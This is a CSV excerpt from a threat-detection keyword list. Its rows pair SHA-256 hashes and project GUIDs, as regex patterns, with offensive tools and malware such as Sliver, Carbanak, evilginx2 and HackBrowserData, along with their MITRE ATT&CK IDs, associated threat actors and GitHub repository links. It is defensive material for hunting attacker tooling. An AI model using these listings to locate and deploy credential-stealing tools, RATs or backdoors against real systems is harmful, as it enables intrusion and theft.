"*3b5369544fbeb32a7685da8992f08261e7ce6b12159b3920618c29a7af930f0a*",".{0,1000}3b5369544fbeb32a7685da8992f08261e7ce6b12159b3920618c29a7af930f0a.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","24951"
"*3b61efcac1e3a7512a89d104037349f917e562139db0f92c28de29b2e216f82f*",".{0,1000}3b61efcac1e3a7512a89d104037349f917e562139db0f92c28de29b2e216f82f.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","24954"
"*3b66b9ef669a7aca55f87ccce04ab1849d23d18c522b5f2514ca0637398ca250*",".{0,1000}3b66b9ef669a7aca55f87ccce04ab1849d23d18c522b5f2514ca0637398ca250.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","Earth Lusca","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","#filehash","N/A","8","10","11931","1725","2025-04-20T11:30:29Z","2020-11-13T16:35:20Z","24955"
"*3b6a44069c343b15c9bafec9feb7d5597f936485c68f29316e96fe97aa15d06d*",".{0,1000}3b6a44069c343b15c9bafec9feb7d5597f936485c68f29316e96fe97aa15d06d.{0,1000}","offensive_tool_keyword","SharpSC",".NET assembly to interact with services. (included in powershell empire)","T1543.003","TA0003","N/A","N/A","Persistence","https://github.com/djhohnstein/SharpSC","1","0","#filehash","N/A","8","1","40","6","2019-09-27T23:04:24Z","2019-09-24T21:05:38Z","24956"
"*3b730f6be970c1671b68792fe163427a15e0fa4426b1d635d9f7e74872f91a7d*",".{0,1000}3b730f6be970c1671b68792fe163427a15e0fa4426b1d635d9f7e74872f91a7d.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","24957"
"*3b73d2414403cb76345c4885921348b96a63499c04027df1cba8b9825959bc1e*",".{0,1000}3b73d2414403cb76345c4885921348b96a63499c04027df1cba8b9825959bc1e.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","24958"
"*3b765fc9d51180b7ff8c93aa1ab9369fdff33f5ec4ebc4c2e913f8355ca12903*",".{0,1000}3b765fc9d51180b7ff8c93aa1ab9369fdff33f5ec4ebc4c2e913f8355ca12903.{0,1000}","offensive_tool_keyword","SharpSCCM","SharpSCCM is a post-exploitation tool designed to leverage Microsoft Endpoint Configuration Manager (a.k.a. ConfigMgr. formerly SCCM) for Lateral Movement and credential gathering without requiring access to the SCCM administration console GUI","T1078 - T1077 - T1547.001 - T1021.001 - T1087 - T1555.003","TA0008 - TA0006 - TA0003 - TA0011","N/A","N/A","Lateral Movement","https://github.com/Mayyhem/SharpSCCM/","1","0","#filehash","N/A","10","7","626","94","2024-09-16T14:57:49Z","2021-08-19T05:09:19Z","24959"
"*3b7eb2083f99deb0f6d2d64030f6ca6ec26e643226d981f7294b0c5340eaa733*",".{0,1000}3b7eb2083f99deb0f6d2d64030f6ca6ec26e643226d981f7294b0c5340eaa733.{0,1000}","offensive_tool_keyword","SharpFtpC2","A Streamlined FTP-Driven Command and Control Conduit for Interconnecting Remote Systems","T1071.002 - T1105 - T1090.001","TA0011","N/A","N/A","C2","https://github.com/PhrozenIO/SharpFtpC2","1","0","#filehash","N/A","10","10","88","15","2023-11-09T10:37:20Z","2023-06-09T12:41:28Z","24961"
"*3B85D7A9-6BD0-4CD8-9009-36554EF24D32*",".{0,1000}3B85D7A9\-6BD0\-4CD8\-9009\-36554EF24D32.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","#GUIDproject","N/A","6","10","3629","1661","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z","24962"
"*3b8b9d91a8ddd3d98da746d79aed9a4f21f5b92eb2ff650e7014f924a0f4c0fc*",".{0,1000}3b8b9d91a8ddd3d98da746d79aed9a4f21f5b92eb2ff650e7014f924a0f4c0fc.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","24964"
"*3ba0023aaa84e8e4e063da17b60752631776d3b61646c026cf05c4a1b44c04bf*",".{0,1000}3ba0023aaa84e8e4e063da17b60752631776d3b61646c026cf05c4a1b44c04bf.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","24968"
"*3ba3ce7c16fd05a1f6bff952c91a537157a4c901575f0d46fadb141c2c8a6842*",".{0,1000}3ba3ce7c16fd05a1f6bff952c91a537157a4c901575f0d46fadb141c2c8a6842.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","0","#filehash","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","24970"
"*3ba5a2d4b11f562ab3da3fc87c2889a16523833ba4ede090ffed40a20e643ed9*",".{0,1000}3ba5a2d4b11f562ab3da3fc87c2889a16523833ba4ede090ffed40a20e643ed9.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","24971"
"*3ba7ec45c5017f57077a98ed61ce1f24dacddfb4928c20351aba2c0ae4398e39*",".{0,1000}3ba7ec45c5017f57077a98ed61ce1f24dacddfb4928c20351aba2c0ae4398e39.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER","Phishing","https://github.com/kgretzky/evilginx2","1","0","#filehash","N/A","10","10","12879","2234","2025-01-21T15:16:19Z","2018-07-10T09:59:52Z","24972"
"*3BB0CD58-487C-4FEC-8001-607599477158*",".{0,1000}3BB0CD58\-487C\-4FEC\-8001\-607599477158.{0,1000}","offensive_tool_keyword","NetshHelperBeacon","DLL to load from Windows NetShell. Will pop calc and execute shellcode.","T1055 - T1218","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/outflanknl/NetshHelperBeacon","1","0","#GUIDproject","N/A","10","2","179","36","2016-09-26T19:57:08Z","2016-09-26T12:52:02Z","24976"
"*3bb553cd-0a48-402d-9812-8daff60ac628*",".{0,1000}3bb553cd\-0a48\-402d\-9812\-8daff60ac628.{0,1000}","offensive_tool_keyword","SharpExfiltrate","Modular C# framework to exfiltrate loot over secure and trusted channels.","T1027 - T1567 - T1561","TA0010 - TA0040 - TA0005","N/A","N/A","Data Exfiltration","https://github.com/Flangvik/SharpExfiltrate","1","0","#GUIDproject","N/A","10","2","126","37","2021-09-12T17:08:02Z","2021-09-08T13:17:00Z","24977"
"*3bb722c6626dae00c3f31a30738761b013d0413b0adac000e7a783fe5cfc4613*",".{0,1000}3bb722c6626dae00c3f31a30738761b013d0413b0adac000e7a783fe5cfc4613.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","24978"
"*3bb82ba795352c150f16bb53c7c457583dcfe44227e693402aa88b80289c0197*",".{0,1000}3bb82ba795352c150f16bb53c7c457583dcfe44227e693402aa88b80289c0197.{0,1000}","offensive_tool_keyword","reconftw","reconFTW is a tool designed to perform automated recon on a target domain by running the best set of tools to perform scanning and finding out vulnerabilities","T1595 - T1590 - T1592 - T1596 - T1598 - T1046 - T1599 - T1213 - T1597","TA0043 - TA0042 - TA0007 - TA0001","N/A","N/A","Vulnerability Scanner","https://github.com/six2dez/reconftw","1","0","#filehash #linux","N/A","7","10","6202","982","2025-04-22T13:01:31Z","2020-12-30T23:52:52Z","24979"
"*3bc2220dcc58819a4a959b434678da39a94f5b03b46779123a5c341f2699dc6c*",".{0,1000}3bc2220dcc58819a4a959b434678da39a94f5b03b46779123a5c341f2699dc6c.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","24981"
"*3bc3143560646803229345fded4a48e904c9e5d1a446c7f9163d7e0010e5dda5*",".{0,1000}3bc3143560646803229345fded4a48e904c9e5d1a446c7f9163d7e0010e5dda5.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","24982"
"*3bcdf1c4ea5d312b3cd0fab543836f842e6121997c9ef1ac2c68e68779745213*",".{0,1000}3bcdf1c4ea5d312b3cd0fab543836f842e6121997c9ef1ac2c68e68779745213.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","24984"
"*3bce7350a70402df5ef6e8b12120ec12151bb3d3c6ae0e7b9eb9c1708acc50d6*",".{0,1000}3bce7350a70402df5ef6e8b12120ec12151bb3d3c6ae0e7b9eb9c1708acc50d6.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","24985"
"*3bd0f9a391c4fec2f65e713974067e8bdb3d99388e5f20b50c0ce867c7a5eb45*",".{0,1000}3bd0f9a391c4fec2f65e713974067e8bdb3d99388e5f20b50c0ce867c7a5eb45.{0,1000}","offensive_tool_keyword","ScheduleRunner","A C# tool with more flexibility to customize scheduled task for both persistence and Lateral Movement in red team operation","T1210 - T1570 - T1021 - T1550","TA0008","N/A","N/A","Persistence","https://github.com/netero1010/ScheduleRunner","1","0","#filehash","N/A","9","4","336","46","2025-01-22T02:06:59Z","2021-10-12T15:27:32Z","24986"
"*3bd5e92bb40161c47fc8610c85646cb66b3de7e121e4fd03789772441a06c858*",".{0,1000}3bd5e92bb40161c47fc8610c85646cb66b3de7e121e4fd03789772441a06c858.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","24988"
"*3be05874bbab1a8400a6f8ad7ff13f7496513d0eff1620de74b7192eff2327ae*",".{0,1000}3be05874bbab1a8400a6f8ad7ff13f7496513d0eff1620de74b7192eff2327ae.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","24990"
"*3be291169fca84dbccbddc5a5884152cc1c8eed62d4d0ad70bb66be6a10e7456*",".{0,1000}3be291169fca84dbccbddc5a5884152cc1c8eed62d4d0ad70bb66be6a10e7456.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","24992"
"*3be874d1451d77eb17c7d8bacd59fd079959385e17068fbb66481e68a7f316ef*",".{0,1000}3be874d1451d77eb17c7d8bacd59fd079959385e17068fbb66481e68a7f316ef.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","24993"
"*3BEF8A16-981F-4C65-8AE7-C612B46BE446*",".{0,1000}3BEF8A16\-981F\-4C65\-8AE7\-C612B46BE446.{0,1000}","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0005 - TA0004","N/A","Evilnum","Defense Evasion","https://github.com/hfiref0x/UACME","1","0","#GUIDproject","N/A","10","10","6711","1348","2025-03-09T03:33:26Z","2015-03-28T12:04:33Z","24995"
"*3bf103c2c2f275c75c34f519c26b72143b038f4b31ae7c2d99e9ffd30bb07761*",".{0,1000}3bf103c2c2f275c75c34f519c26b72143b038f4b31ae7c2d99e9ffd30bb07761.{0,1000}","offensive_tool_keyword","jackdaw","Jackdaw is here to collect all information in your domain. store it in a SQL database and show you nice graphs on how your domain objects interact with each-other an how a potential attacker may exploit these interactions. It also comes with a handy feature to help you in a password-cracking project by storing/looking up/reporting hashes/passowrds/users.","T1087 - T1482 - T1201 - T1213 - T1003","TA0007 - TA0008 - TA0009 - TA0006","N/A","N/A","Reconnaissance","https://github.com/skelsec/jackdaw","1","0","#filehash","N/A","5","6","576","89","2025-03-15T13:37:50Z","2019-03-27T18:36:41Z","24996"
"*3bf281b68fa29aece79cd0126a3b4552720cefe1045dc974b82523e439a11694*",".{0,1000}3bf281b68fa29aece79cd0126a3b4552720cefe1045dc974b82523e439a11694.{0,1000}","offensive_tool_keyword","SharpEventLog","reads all computer information related to successful (4624) or failed (4625) logins on the local machine to quickly identify operations and maintenance personnel during internal network penetration","T1078 - T1087.001","TA0007","N/A","N/A","Discovery","https://github.com/uknowsec/SharpEventLog","1","0","#filehash","N/A","4","3","205","34","2019-10-15T06:26:52Z","2019-10-15T06:14:32Z","24997"
"*3bf8610241a808e85e6ebaac2bb92ba4ae92c3ec1a6e56e21937efec71ea5425*",".{0,1000}3bf8610241a808e85e6ebaac2bb92ba4ae92c3ec1a6e56e21937efec71ea5425.{0,1000}","offensive_tool_keyword","Carbanak","remote backdoor used by a group of the same name (Carbanak). It is intended for espionage - data exfiltration and providing remote access to infected machines","T1021.002 - T1071.001 - T1105 - T1059 - T1003 - T1078 - T1041","TA0006 - TA0008 - TA0010 - TA0011","Carbanak","FIN7 - Carbanak","Malware","https://github.com/0x25bit/Updated-Carbanak-Source-with-Plugins","1","0","#filehash","N/A","10","4","396","223","2019-05-01T23:31:35Z","2019-04-22T21:01:08Z","24999"
"*3bfec62c094366844c3e4c0e257e01678f55ef5b*",".{0,1000}3bfec62c094366844c3e4c0e257e01678f55ef5b.{0,1000}","offensive_tool_keyword","PowerLess","PowerShell-based modular backdoor that has been used by Magic Hound group","T1560 - T1217 - T1059.001 - T1005 - T1074.001 - T1140 - T1573 - T1105 - T1056.001","TA0011 - TA0009 - TA0010 - TA0005 - TA0002 - TA0006","N/A","Magic Hound","Malware","https://gist.github.com/farzinenddo/bb1f1ecb56aa9326abc7b47fc99e588e","1","0","#filehash","N/A","10","4","N/A","N/A","N/A","N/A","25000"
"*3c00990e4f6c4e621ae80638b66ceb60e39ebe727d7f91d36e99a5aef53f6359*",".{0,1000}3c00990e4f6c4e621ae80638b66ceb60e39ebe727d7f91d36e99a5aef53f6359.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","25001"
"*3c02853e5ddae494fd654fc0b44687f5c45a03092f6a2594725b8589928e645e*",".{0,1000}3c02853e5ddae494fd654fc0b44687f5c45a03092f6a2594725b8589928e645e.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","25002"
"*3C0E89F1-1D3D-4651-9A44-FCCABB340E02*",".{0,1000}3C0E89F1\-1D3D\-4651\-9A44\-FCCABB340E02.{0,1000}","offensive_tool_keyword","Carbanak","remote backdoor used by a group of the same name (Carbanak). It is intended for espionage - data exfiltration and providing remote access to infected machines","T1021.002 - T1071.001 - T1105 - T1059 - T1003 - T1078 - T1041","TA0006 - TA0008 - TA0010 - TA0011","Carbanak","FIN7 - Carbanak","Malware","https://github.com/0x25bit/Updated-Carbanak-Source-with-Plugins","1","0","#GUIDproject","N/A","10","4","396","223","2019-05-01T23:31:35Z","2019-04-22T21:01:08Z","25003"
"*3c145dbeaaca5c563c4fe634cd41deeab29712834d4bbf324e0268aded1013c7*",".{0,1000}3c145dbeaaca5c563c4fe634cd41deeab29712834d4bbf324e0268aded1013c7.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","25006"
"*3c1785d7fa372507bd98842717b7bc12744b15f7a7a97856790f664561c959c2*",".{0,1000}3c1785d7fa372507bd98842717b7bc12744b15f7a7a97856790f664561c959c2.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","25007"
"*3C21F82B-B958-457A-82BB-B8A795316D3D*",".{0,1000}3C21F82B\-B958\-457A\-82BB\-B8A795316D3D.{0,1000}","offensive_tool_keyword","RPC-Backdoor","A basic emulation of an ""RPC Backdoor""","T1071.004","TA0011","N/A","N/A","C2","https://github.com/eladshamir/RPC-Backdoor","1","0","#GUIDproject","N/A","10","10","240","45","2022-08-25T14:37:41Z","2022-08-16T13:12:05Z","25009"
"*3c27eb99e32086b700d73f8153e53bc24ba62f08936b1be36b6611c5704a067a*",".{0,1000}3c27eb99e32086b700d73f8153e53bc24ba62f08936b1be36b6611c5704a067a.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","25010"
"*3c27f3968cf79a0b5e9402eea64b259d0b4e22d08932281a20ff9a67a472911c*",".{0,1000}3c27f3968cf79a0b5e9402eea64b259d0b4e22d08932281a20ff9a67a472911c.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","25011"
"*3c2d248fa4df74a0a05d7bdfba9a4796938c20fed174912c2a35c7c97e22f7e3*",".{0,1000}3c2d248fa4df74a0a05d7bdfba9a4796938c20fed174912c2a35c7c97e22f7e3.{0,1000}","offensive_tool_keyword","p0wnedShell","p0wnedShell is an offensive PowerShell host application written in C# that does not rely on powershell.exe but runs powershell commands and functions within a powershell runspace environment (.NET). It has a lot of offensive PowerShell modules and binaries included to make the process of Post Exploitation easier. What we tried was to build an ?all in one? Post Exploitation tool which we could use to bypass all mitigations solutions (or at least some off). and that has all relevant tooling included. You can use it to perform modern attacks within Active Directory environments and create awareness within your Blue team so they can build the right defense strategies.","T1086 - T1059 - T1106 - T1566","TA0002 - TA0003 - TA0007","N/A","N/A","Defense Evasion","https://github.com/Cn33liz/p0wnedShell","1","0","#filehash","N/A","9","10","1535","335","2019-08-02T16:24:39Z","2015-12-25T11:44:37Z","25012"
"*3c2ff027b13ba2b710d9ce7055cebd5e220b2713b12c765598bf0bcef9dc3cef*",".{0,1000}3c2ff027b13ba2b710d9ce7055cebd5e220b2713b12c765598bf0bcef9dc3cef.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","#filehash","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","25013"
"*3c3361267404dc1dc47eaac52cd347c8c4a408f0ca3bf2da2ffb9152a85a1555*",".{0,1000}3c3361267404dc1dc47eaac52cd347c8c4a408f0ca3bf2da2ffb9152a85a1555.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","25014"
"*3c36e9e5780af17be16e0326c606e466f39cc9a736c3ecb2e8e965d00c9b56d0*",".{0,1000}3c36e9e5780af17be16e0326c606e466f39cc9a736c3ecb2e8e965d00c9b56d0.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","25015"
"*3c39207a61a348efa7dd2db2d85c1e562beedfa8c4593d1d29b7751bc84aad85*",".{0,1000}3c39207a61a348efa7dd2db2d85c1e562beedfa8c4593d1d29b7751bc84aad85.{0,1000}","offensive_tool_keyword","fakelogonscreen","Fake Windows logon screen to steal passwords","T1056.002 - T1078 - T1110 - T1555","TA0006 - TA0003 - TA0009","N/A","N/A","Credential Access","https://github.com/bitsadmin/fakelogonscreen","1","0","#filehash","N/A","10","10","1325","236","2020-02-03T23:28:01Z","2020-02-01T18:51:35Z","25016"
"*3c3a96d02e34589d314b230c417b122970e492282767211866c8ac042e8bd556*",".{0,1000}3c3a96d02e34589d314b230c417b122970e492282767211866c8ac042e8bd556.{0,1000}","offensive_tool_keyword","S4UTomato","Escalate Service Account To LocalSystem via Kerberos","T1558 - T1558.002 - T1548.002 - T1078 - T1078.004","TA0006 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/S4UTomato","1","0","#filehash","N/A","10","4","394","76","2023-09-14T08:53:19Z","2023-07-30T11:51:57Z","25017"
"*3c40fcf023afe126e8cc67593d21bc3ee9af7c56e3f1b8e9614cfd58030c29af*",".{0,1000}3c40fcf023afe126e8cc67593d21bc3ee9af7c56e3f1b8e9614cfd58030c29af.{0,1000}","offensive_tool_keyword","knowsmore","KnowsMore is a swiss army knife tool for pentesting Microsoft Active Directory (NTLM Hashes - BloodHound - NTDS and DCSync).","T1003 - T1098 - T1134 - T1484 - T1178 - T1078","TA0006 - TA0008 - TA0003 - TA0011 - TA0005","N/A","Black Basta","Credential Access","https://github.com/helviojunior/knowsmore","1","0","#filehash","N/A","10","3","223","32","2025-04-14T14:52:09Z","2023-01-09T14:02:37Z","25018"
"*3c43abec5368c3917c777012e70ae7977f80f170ff3bd0400b907fad09b8acc1*",".{0,1000}3c43abec5368c3917c777012e70ae7977f80f170ff3bd0400b907fad09b8acc1.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","25019"
"*3c4ba52ba41f4b7f3d87a8817dcb01838345e9bf1bd574aab09041905d5bde82*",".{0,1000}3c4ba52ba41f4b7f3d87a8817dcb01838345e9bf1bd574aab09041905d5bde82.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","25020"
"*3c4e36ce4e07e00a125f6ed01fc6797bac0c7e5ef415b4af08ca024dbb8af7de*",".{0,1000}3c4e36ce4e07e00a125f6ed01fc6797bac0c7e5ef415b4af08ca024dbb8af7de.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","25021"
